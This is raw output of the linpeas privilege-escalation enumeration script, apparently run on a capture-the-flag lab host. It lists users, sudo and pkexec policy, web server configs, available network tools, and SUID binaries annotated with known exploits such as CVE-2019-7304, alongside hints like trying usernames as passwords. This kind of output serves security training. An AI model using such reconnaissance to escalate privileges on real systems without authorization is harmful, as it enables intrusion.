/usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo;unix-group:admin ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console dev:x:1000:1000:,,,:/home/dev:/bin/bash root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=1000(dev) gid=1000(dev) groups=1000(dev) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=106(uuidd) gid=110(uuidd) groups=110(uuidd) uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=108(landscape) gid=112(landscape) groups=112(landscape) uid=109(pollinate) gid=1(daemon) groups=1(daemon) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) 
uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=999(_laurel) gid=999(_laurel) groups=999(_laurel) ╔══════════╣ Login now 11:35:20 up 2:37, 0 users, load average: 19.85, 21.69, 12.65 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons reboot system boot Sun Feb 12 08:57:45 2023 still running 0.0.0.0 dev pts/0 Wed Feb 8 12:55:27 2023 - Wed Feb 8 12:57:32 2023 (00:02) 10.10.14.23 reboot system boot Wed Feb 8 12:55:01 2023 - Wed Feb 8 12:57:32 2023 (00:02) 0.0.0.0 dev pts/0 Wed Feb 8 12:46:06 2023 - Wed Feb 8 12:48:54 2023 (00:02) 10.10.14.23 reboot system boot Wed Feb 8 12:45:38 2023 - Wed Feb 8 12:48:54 2023 (00:03) 0.0.0.0 dev pts/0 Wed Feb 8 12:14:41 2023 - Wed Feb 8 12:16:08 2023 (00:01) 10.10.14.23 reboot system boot Wed Feb 8 12:14:20 2023 - Wed Feb 8 12:16:09 2023 (00:01) 0.0.0.0 wtmp begins Wed Feb 8 12:14:20 2023 ╔══════════╣ Last time logon each user Username Port From Latest dev pts/0 10.10.14.23 Wed Feb 8 12:55:27 +0000 2023 ╔══════════╣ Password policy PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! 
╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /usr/bin/g++ /usr/bin/gcc /usr/bin/lxc /usr/bin/make /bin/nc /bin/netcat /usr/bin/perl /usr/bin/php /bin/ping /usr/bin/python3 /usr/bin/python3.6 /usr/bin/sudo /usr/bin/wget ╔══════════╣ Installed Compilers ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler /usr/bin/gcc /usr/bin/g++ ╔══════════╣ Searching mysql credentials and exec ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: Server version: Apache/2.4.29 (Ubuntu) Server built: 2023-01-31T14:01:53 httpd Not Found Nginx version: /etc/apache2/mods-available/php7.4.conf- /etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-available/php7.4.conf- /etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source -- /etc/apache2/mods-enabled/php7.4.conf- /etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-enabled/php7.4.conf- /etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source ══╣ Nginx modules ngx_http_geoip_module.so ngx_http_image_filter_module.so ngx_http_xslt_filter_module.so ngx_mail_module.so ngx_stream_module.so ══╣ PHP exec extensions drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled drwxr-xr-x 2 root root 4096 
Jan 16 09:49 /etc/nginx/sites-enabled lrwxrwxrwx 1 root root 34 Nov 20 21:46 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name _; location / { proxy_pass http://127.0.0.1:3000/; } } server { listen 80; listen [::]:80; server_name prd.m.rendering-api.interface.htb; root /var/www/api; index index.php; location / { fastcgi_pass unix:/run/php/php7.4-fpm.sock; fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; include fastcgi_params; try_files $uri $uri/ /index.php; } } -rw-r--r-- 1 root root 1332 Feb 23 2021 /etc/apache2/sites-available/000-default.conf ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined -rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/apache2/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 72600 Nov 8 11:33 /etc/php/7.4/cli/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/fpm/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf user www-data; worker_processes auto; pid /run/nginx.pid; include /etc/nginx/modules-enabled/*.conf; events { worker_connections 768; } http { sendfile on; tcp_nopush on; tcp_nodelay on; 
keepalive_timeout 65; types_hash_max_size 2048; include /etc/nginx/mime.types; default_type application/octet-stream; ssl_prefer_server_ciphers on; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; gzip on; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } -rw-r--r-- 1 root root 389 Apr 6 2018 /etc/default/nginx -rwxr-xr-x 1 root root 4579 Apr 6 2018 /etc/init.d/nginx -rw-r--r-- 1 root root 329 Apr 6 2018 /etc/logrotate.d/nginx drwxr-xr-x 8 root root 4096 Jan 16 09:49 /etc/nginx -rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf user www-data; worker_processes auto; pid /run/nginx.pid; include /etc/nginx/modules-enabled/*.conf; events { worker_connections 768; } http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; include /etc/nginx/mime.types; default_type application/octet-stream; ssl_prefer_server_ciphers on; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; gzip on; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } lrwxrwxrwx 1 root root 61 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf load_module modules/ngx_http_image_filter_module.so; lrwxrwxrwx 1 root root 48 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf load_module modules/ngx_mail_module.so; lrwxrwxrwx 1 root root 50 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf load_module modules/ngx_stream_module.so; lrwxrwxrwx 1 root root 60 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf load_module modules/ngx_http_xslt_filter_module.so; lrwxrwxrwx 1 root root 54 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-geoip.conf -> 
/usr/share/nginx/modules-available/mod-http-geoip.conf load_module modules/ngx_http_geoip_module.so; -rw-r--r-- 1 root root 217 Apr 6 2018 /etc/nginx/snippets/snakeoil.conf ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem; ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key; -rw-r--r-- 1 root root 422 Apr 6 2018 /etc/nginx/snippets/fastcgi-php.conf fastcgi_split_path_info ^(.+\.php)(/.+)$; try_files $fastcgi_script_name =404; set $path_info $fastcgi_path_info; fastcgi_param PATH_INFO $path_info; fastcgi_index index.php; include fastcgi.conf; -rw-r--r-- 1 root root 1077 Apr 6 2018 /etc/nginx/fastcgi.conf fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param QUERY_STRING $query_string; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param CONTENT_TYPE $content_type; fastcgi_param CONTENT_LENGTH $content_length; fastcgi_param SCRIPT_NAME $fastcgi_script_name; fastcgi_param REQUEST_URI $request_uri; fastcgi_param DOCUMENT_URI $document_uri; fastcgi_param DOCUMENT_ROOT $document_root; fastcgi_param SERVER_PROTOCOL $server_protocol; fastcgi_param REQUEST_SCHEME $scheme; fastcgi_param HTTPS $https if_not_empty; fastcgi_param GATEWAY_INTERFACE CGI/1.1; fastcgi_param SERVER_SOFTWARE nginx/$nginx_version; fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REMOTE_PORT $remote_port; fastcgi_param SERVER_ADDR $server_addr; fastcgi_param SERVER_PORT $server_port; fastcgi_param SERVER_NAME $server_name; fastcgi_param REDIRECT_STATUS 200; -rw-r--r-- 1 root root 374 Apr 6 2018 /etc/ufw/applications.d/nginx drwxr-xr-x 3 root root 4096 Nov 20 21:46 /usr/lib/nginx -rwxr-xr-x 1 root root 1149096 Nov 10 06:38 /usr/sbin/nginx drwxr-xr-x 2 root root 4096 Jan 16 09:49 /usr/share/doc/nginx drwxr-xr-x 4 root root 4096 Nov 20 21:46 /usr/share/nginx -rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf load_module modules/ngx_http_xslt_filter_module.so; -rw-r--r-- 1 root root 46 Nov 10 06:38 
/usr/share/nginx/modules-available/mod-http-geoip.conf load_module modules/ngx_http_geoip_module.so; -rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.conf load_module modules/ngx_stream_module.so; -rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.conf load_module modules/ngx_mail_module.so; -rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.conf load_module modules/ngx_http_image_filter_module.so; drwxr-xr-x 7 root root 4096 Jan 16 09:49 /var/lib/nginx drwxr-xr-x 2 root adm 4096 Feb 8 12:14 /var/log/nginx ╔══════════╣ Analyzing FastCGI Files (limit 70) -rw-r--r-- 1 root root 1007 Apr 6 2018 /etc/nginx/fastcgi_params ╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Aug 16 18:38 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz ╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/ldap ╔══════════╣ Searching ssl/ssh files ChallengeResponseAuthentication no UsePAM yes PasswordAuthentication yes ══╣ Some certificates were found (out limited): /etc/pollinate/entropy.ubuntu.com.pem 44091PSTORAGE_CERTSBIN ══╣ Some home ssh config file was found /usr/share/openssh/sshd_config ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication 
yes ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Feb 6 10:01 /etc/pam.d -rw-r--r-- 1 root root 2133 Mar 30 2022 /etc/pam.d/sshd ╔══════════╣ Searching tmux sessions ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions tmux 2.6 /tmp/tmux-33 ╔══════════╣ Analyzing Cloud Init Files (limit 70) -rw-r--r-- 1 root root 3659 Nov 28 16:50 /etc/cloud/cloud.cfg lock_passwd: True ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Feb 6 10:00 /usr/share/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd ╔══════════╣ Analyzing Github Files (limit 70) drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/meant/.github drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/node-gyp/.github drwxr-xr-x 2 root root 4096 Feb 6 10:01 /usr/lib/node_modules/npm/node_modules/npm-normalize-package-bin/.github drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.github drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.github drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.github drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/dompdf/dompdf/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-svg-lib/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.git ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 360 Nov 20 
21:52 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg -rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg -rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 3267 Jul 4 2022 /usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 2206 Nov 20 22:04 /usr/share/keyrings/nodesource.gpg -rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg -rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg -rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg -rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg -rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg -rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg -rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg -rw-r--r-- 1 root root 2236 Feb 8 12:14 /var/lib/ubuntu-advantage/apt-esm/etc/apt/trusted.gpg.d/ubuntu-advantage-esm-apps.gpg -rw------- 1 www-data www-data 1200 Feb 12 10:54 /var/www/.gnupg/trustdb.gpg drwx------ 3 dev dev 4096 Jan 16 09:49 /home/dev/.gnupg drwx------ 3 www-data www-data 4096 Feb 12 10:54 /var/www/.gnupg ╔══════════╣ Analyzing 
Postfix Files (limit 70) -rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix ╔══════════╣ Analyzing FTP Files (limit 70) -rw-r--r-- 1 root root 69 Nov 8 11:33 /etc/php/7.4/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Oct 28 17:39 /etc/php/8.1/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Jan 6 15:17 /etc/php/8.2/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Jan 13 10:42 /usr/share/php7.4-common/common/ftp.ini -rw-r--r-- 1 root root 69 Feb 3 09:35 /usr/share/php8.2-common/common/ftp.ini ╔══════════╣ Analyzing Bind Files (limit 70) -rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind ╔══════════╣ Analyzing Interesting logs Files (limit 70) -rw-r--r-- 1 root root 8939 Feb 12 10:42 /var/log/nginx/access.log -rw-r--r-- 1 root root 34729 Feb 12 10:42 /var/log/nginx/error.log ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc -rw-r--r-- 1 dev dev 3771 Jan 10 12:55 /home/dev/.bashrc -rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile -rw-r--r-- 1 dev dev 807 Jan 10 12:55 /home/dev/.profile ╔═══════════════════╗ ═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping -rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 44K Nov 29 12:25 /bin/su -rwsr-xr-x 1 root root 59K Nov 29 12:25 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 
root root 75K Nov 29 12:25 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 146K Jan 16 14:40 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newgidmap -rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 40K Nov 29 12:25 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newuidmap -rwsr-xr-x 1 root root 44K Nov 29 12:25 /usr/bin/chsh -rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/gpasswd -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-- 1 root messagebus 42K Oct 25 13:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 128K Dec 1 08:52 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304) -rwsr-xr-x 1 root root 427K Mar 30 2022 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 14K Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1 ╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root ssh 355K Mar 30 2022 /usr/bin/ssh-agent -rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall -rwxr-sr-x 1 root shadow 23K Nov 29 12:25 /usr/bin/expiry -rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate -rwxr-sr-x 1 root shadow 71K Nov 29 12:25 /usr/bin/chage -rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root crontab 39K May 10 2022 /usr/bin/crontab -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/unix_chkpwd ╔══════════╣ Checking 
misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d /etc/ld.so.conf.d/libc.conf /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf /usr/local/lib/x86_64-linux-gnu /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu ╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities Current env capabilities: Current: = Current proc capabilities: CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000 Parent Shell capabilities: 0x0000000000000000= Files with capabilities (limited to 50): /usr/bin/mtr-packet = cap_net_raw+ep ╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ╔══════════╣ AppArmor binary profiles -rw-r--r-- 1 root root 3194 Mar 26 2018 sbin.dhclient -rw-r--r-- 1 root root 125 Nov 23 2018 usr.bin.lxc-start -rw-r--r-- 1 root root 2857 Apr 7 2018 usr.bin.man -rw-r--r-- 1 root root 28486 Nov 28 04:56 usr.lib.snapd.snap-confine.real -rw-r--r-- 1 root root 1550 Apr 24 2018 usr.sbin.rsyslogd -rw-r--r-- 1 root root 1353 Mar 31 2018 usr.sbin.tcpdump ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path /usr/local/sbin/cleancache.sh /usr/bin/gettext.sh ╔══════════╣ Executable files potentially added by user (limit 70) 2023-02-12+11:35:47.5262858350 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control 2023-02-12+11:35:47.5233455830 /var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control 2023-02-12+11:35:47.5193169360 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control 
2023-02-12+11:35:47.5144354070 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control 2023-02-12+11:35:47.5108056660 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control 2023-02-12+11:35:47.5063616340 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control 2023-02-12+11:35:47.5014851400 /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control 2023-02-12+11:35:47.4949269720 /var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control 2023-02-12+11:35:47.4863812300 /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control 2023-02-12+11:35:47.4799478780 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control 2023-02-12+11:35:47.4738381840 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control 2023-02-12+11:35:47.4631773480 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control 2023-02-12+11:35:47.4262852130 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control 2023-02-12+11:35:47.4234191460 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control 2023-02-12+11:35:47.4202998740 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control 2023-02-12+11:35:47.4170212400 /var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control 2023-02-12+11:35:47.4141705950 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control 2023-02-12+11:35:47.4113842460 /var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control 2023-02-12+11:35:47.4083850090 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control 2023-02-12+11:35:47.4049923800 /var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control 2023-02-12+11:35:47.4016353930 
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control 2023-02-12+11:35:47.3982935590 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control 2023-02-12+11:35:47.3940425300 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control 2023-02-12+11:35:47.3897399070 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control 2023-02-12+11:35:47.3866268420 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control 2023-02-12+11:35:47.3834444920 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control 2023-02-12+11:35:47.3803600670 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control 2023-02-12+11:35:47.3771589270 /var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control 2023-02-12+11:35:47.3739546510 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control 2023-02-12+11:35:47.3706797350 /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control 